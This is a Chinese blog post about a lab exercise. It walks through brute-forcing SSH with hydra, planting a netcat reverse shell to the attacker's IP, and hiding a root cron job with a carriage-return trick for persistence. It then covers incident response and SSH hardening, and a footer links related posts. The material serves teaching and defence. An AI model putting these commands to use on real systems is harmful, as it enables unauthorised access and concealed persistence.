记录一下ssh爆破

已于 2024-08-02 10:00:18 修改
阅读量1.5k 收藏 21
点赞数 36
分类专栏: 网安靶场 文章标签: ssh 服务器 运维
于 2024-06-24 23:56:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2302_78903258/article/details/139939865
版权

首先准备两台机器,一台作为攻击机,一台作为靶机

攻击机:192.168.48.138

靶机:192.168.48.135

1.信息收集

使用nmap扫描目标主机的端口

nmap 192.168.48.135

发现开启了22号端口,尝试进行爆破

2.爆破ssh

使用hydra(九头蛇)进行爆破,也可以用msf、美杜莎进行爆破,详细hydra内容请看

hydra -L users.txt -P password.txt ssh://192.168.48.135

3.登录ssh 

ssh root@192.168.48.135

4.尝试创建隐藏计划任务

进入 /tmp 目录,vim创建xx.sh文件------>>>task.sh

文件内容写

#! /bin/bash

nc 192.168.48.138 8888 -e /bin/bash                                   ----nc反弹shell

接着查看权限:ls -l task.sh

增加可执行权限:chmod +x task.sh         或者chmod 777 task.sh

 接着vim创建一个隐藏文件create_task.sh,文件内容

(crontab -l;printf "* * * * * /tmp/task.sh;\rno crontw-wab for `whoami` %100c\n") |crontab-

解释:查看计划任务,输出***,每隔一分钟执行task.sh文件,\r换行符,创建计划任务

同样在此加上执行权限:chmod +x create_task.sh

最后开启此文件:   ./create_task.sh

注意:由于我们创建的是隐藏的计划任务,所以在执行此文件时,会返回提示信息

5.尝试nc连接目标主机的shell

接着在攻击机上开启一个终端,利用nc反弹shell进行连接

开启监听:nc -lvp 8888 

创建计划任务目的:权限维持,更好方便我们连接 

应急响应过程

1.事件排查,查看网络情况

netstat -antpl

2.查看守护进程,发现计划任务

pstree -p         //查看进程树

systemctl status 193250(pid)     //查看具体进程

3.查看计划任务

crontab -l                 //普通命令未发现有计划任务,可能是计划隐藏任务

cat -A /var/spool/cron/crontabs/root                   //查看计划任务

4.找到task.sh文件

ls -l /tmp/task.sh          //查看上传的文件的时间

cat /tmp/task.sh           //查看上传文件的内容,发现是通过nc反弹shell

溯源分析

1.分析任务文件task.sh

ls -l /tmp/task.sh          //查看上传的文件的时间

2.查看登录日志

last -f /var/log/wtmp               //登录成功的日志

last -f /var/log/btmp              //登录失败的日志

3.总结 

爆破时间、爆破账号、攻击者ip

事件处置

1.删除计划任务,结束异常进程

crontab -r -u root                                            //删除隐藏计划任务

 cat -A /var/spool/cron/crontabs/root              //检查计划任务是否删除成功

kill 193250                                                     //杀死恶意进程

2.删除恶意文件

rm task.sh

rm create_task.sh 

3.修改密码,关闭root用户远程连接权限 

 passwd root              //修改root密码

 vim /etc/ssh/sshd_config         //关闭root用户远程连接权限,修改PermitRootLogin为no,增强权限控制

4.修改ssh默认端口

vim /etc/ssh/sshd_config         //将22端口修改成其他端口,并将#删掉

总体来说,应急响应的过程都是类似的,知识上面的细节不一样,大家根据靶场去学习不同的知识,对大家是很有帮助的[护网训练]应急响应靶机整理 (qq.com) 以上给大家提供应急响应靶场

SSH爆破攻击及应急响应/事件处置
简介
05-28 4139
随着互联网的不断发展,网络安全越来越得到重视了…实在是编不下去了,就是想随便写一个开头,就没了。提示:以下是本篇文章正文内容,下面案例可供参考ssh(安全外壳协议)(secure shell),是一种加密的网络传输协议,可以在不安全的网络环境中提供安全的传输环境,ssh通过在网络中创建安全隧道来实现ssh客户端与服务端之间的连接,ssh最常见的用途是远程登陆系统,ssh使用率最高的场合是unix系统本文就是很简单地讲解了ssh爆破和防御,THE END。
记录一次ssh密码被爆破
06-14 629
概述 事情是这样的,一天登录家里服务器的时候无意间看到了下面 There was 242 failed login attempt since the last successful login. 这个时候我就意识到有人在爆破我的ssh密码了,我的服务器架构是下面这样的 开始我也没有在意,...
kali中Hydra用法及对ssh,数据库密码的爆破
weixin_46263525的博客
07-25 7096
kali中Hydra的用法及对ssh,数据库密码的爆破
【网络安全渗透测试零基础入门】之Hydra密码爆破工具使用教程图文教程,超强干货建议收藏!
最新发布
2301_79455190的博客
03-28 873
这是我给粉丝盆友们整理的网络安全渗透测试入门阶段暴力猜解与防御基础教程。本文主要讲解Hydra密码爆破工具Hydra也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。参数:-l 指定用户名-p 指定密码-L 指定用户名字典-P 指定密码字典-C 指定所用格式为“user:password”的字典文件-en null,表示尝试空密码s same,把用户名本身当做密码进行尝试r 反向,把用户名倒叙,当做密码进行尝试。-vV 显示执行细节-o 保存执行结果。
ssh爆破账户
weixin_43622525的博客
12-07 749
1首先在云服务器centos下创建一个账户qq用来爆破 2使用超级弱口令检查工具 超级弱口令检查工具是一款Windows平台的弱口令审计工具,支持批量多线程检查,可快速发现弱密码、弱口令账号,密码支持和用户名结合进行检查,大大提高成功率,支持自定义服务端口和字典。 使用方法: 填写目标(可以是单个IP或者域名,也可以是IP地址范围) 示例: 192.168.1.1 www.baidu.com 192.168.1.1-192.168.200.1 192.168.1.1-192.168.1.20..
漏洞复现篇:ssh爆破
m0_65615852的博客
04-18 4739
漏洞复现篇:ssh爆破(非常详细的ssh爆破过程)
kali linux-msf-ssh爆破
10-13
使用 nmap(-A -T4参数) metasploit (直接search 查找,然后 use利用就好了)本模块将测试SSH登录,在一系列的机器和报告成功登录。如果你有一个数据库加载插件和连接到一个数据库,该模块会记录成功登录和HOSTS使您可以跟踪您的访问。
SSH端口爆破及其应急响应方案
m0_58540923的博客
07-26 2466
Secure Shell (安全外壳协议,简称SSH) 是一种加密的网络传输协议;用途:安全远程登录;可帮助我们在windows下去连接并操作linux服务器。常见的SSH客户端有putty、SSH Secure Shell、MobaXterm 、Xshell等;常用端口:22爆破时间、爆破用户、攻击者ip、攻击方式。
linux ssh登录ip记录,Linux收集SSH爆破记录(拉入IP黑名单)
weixin_33957458的博客
05-07 1559
一:收集黑名单IP收集大量的ssh登录信息。#存文件便于以下的操作lastb >> lastb.log#过滤其它字段,只保留ip数据cat lastb.log|awk -F " " '{print $3}' >> ips.log#记录ip的出现次数cat ips.log | sort | uniq -c >> ip_uniq.log#最终形成列表cat ip_u...
SSH爆破:是什么?怎么查?怎么预防?
weixin_52730346的博客
12-24 4723
一、SSH爆破是什么? 如果在设置SSH服务时,管理员设置了容易被猜解出来的用户名和密码(弱口令),那么云服务器容易被黑客使用对应的密码工具进行暴力破解弱口令。破解出来就可以使用对应的用户名和密码登录系统。所以提醒大家:云服务器的登录密码一定不要设置为弱口令。 二、检查SSH是否被爆破 之前我的小鸟云内蒙bgp云服务器密码就是用的弱口令,差一点就被爆破了,后来联系了技术人员,自己也上网查找了一些资料,整理如下: 1.查看自己是否被爆破爆破者IP cat /var/log/secure|awk '/Fail
一次SSH爆破攻击haiduc工具的应急响应
HBohan的博客
04-06 4680
一、概述 2022年3月底,在网络安全监测中发现某网络攻击组织利用SSH爆破投放挖矿程序的活动比较活跃,主要涉及的是一个haiduc的工具。 二、检测定位阶段工作说明 2.1、异常现象确认 服务器被植入木马病毒,并对内网进行暴力破解。本次发起暴力破解的主机为10.101.2.210。 2.2、溯源分析过程 通过态势感知查看暴力破解检测日志,发现最早从2月16日凌晨3点半左右出现暴力破解告警情况,攻击源为10.101.2.210服务器。 三、抑制阶段工作说明 临时配置防火墙禁止101.2.210访问其他区域服
多线程SSH爆破
04-23
ssh环境,通过action触发一个多线程任务,每个任务调用一个继承HibernateDaoSupport的service的方法,现在要每个线程都绑定一个新的hibernate session
python——ssh多线程爆破脚本
地址ch3nye.top
02-09 2707
今天花了一下午写了个爆破ssh的多线程脚本,debug到新闻联播,队大佬来说是个辣鸡脚本,我在这记录一下,如有需要可以拿去用。 可以直接clone我的github:https://github.com/1344098010/BruteForceSSH 说明 环境python3.7 windows和linux均可运行  爆破程序入口 start.py  PS F:\SSHBF&g...
linux防止sshd被爆破(安装denyhosts)
weixin_33701251的博客
06-20 219
  这是一篇收集在日志里的文档,当初查看服务器sshd日志发现很多不明IP尝试登陆,因此想用什么办法阻止这样的事情发生。网上找了下用denyhosts可以解决这样的问题,因而也就将其收集在日志里了。由于时间较久远,找不到原文的出处,如果你知道原文出处,可以联系我加上。好了,入正题。   Denyhosts 是一个以Python2.3编写的程序,它主要根据系统日志文件/var/log/secure...
记录一次Linux服务器被人使用SSH字典爆破
互联网架构小马的博客
07-27 1488
2024年1.20凌晨睡了一觉,早上起来用termux远程ssh登录小主机发现密码没法登录了,一直显示密码错误,到了晚上用电脑ssh连接小主机,发现小主机真的没法登录了,直接把小主机接上屏幕查看,发现密码被人修改了,系统都进不去,而且主机风扇一直呼呼转,估计是cpu使用率上来了,这下只能进到linux的安全模式进行密码修改了。挖矿程序一般都设置了定时任务启动脚本程序,查看定时任务,crontab -l查看是找不到的��得看/etc/crontab文件,执行 cat /etc/crontab。
ssh爆破脚本
weixin_34245082的博客
09-08 560
前些天,基友发我一个ssh爆破工具,看起来很吊的样子。然后我就无聊自己写了个py脚本的。 单线程:慢成狗----- #coding:utf-8 #author:jwong import threading import os import time import paramiko import sys import Queue import socket BA...
ssh爆破
weixin_30737433的博客
01-14 398
使用pramiko模块 代码图: import paramiko import sys import time def cont(): b=open(sys.argv[1],'r').read().split('\n') for pwd in b: try: client=paramiko.SSHClient() client.set...
使用hydra进行SSH爆破
qq_53218512的博客
06-02 7966
mobaxterm 的功能非常全面,几乎提供了所有重要的远程网络工具(比如 SSH、X11、RDP、VNC、FTP、MOSH 等),以及 Windows 桌面上的 Unix 命令(bash、ls、cat、sed、grep、awk、rsync 等),登录之后默认开启 sftp 模式。命令的意思是:使用bin.bash里面的shell,用nc命令反弹shell,反弹到攻击机的7777端口,-e代表需要执行的指令,这里是要执行/bin/bash。发现通过计划任务执行了bash/tmp下面的task.sh文件。
SSh爆破类 Fucksshexploit 工具-ssh连接类
pyphrb的博客
09-22 3779
SSh爆破类 Fucksshexploit 工具 fuckSsh = Fucksshexploit('10.1.6.168') fuckSsh.setUserPwd('root', 'xxoo') fuckSsh.run()#!/usr/bin/env python # coding=utf-8 __author__ = 'pyphrb' import paramikoclas
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值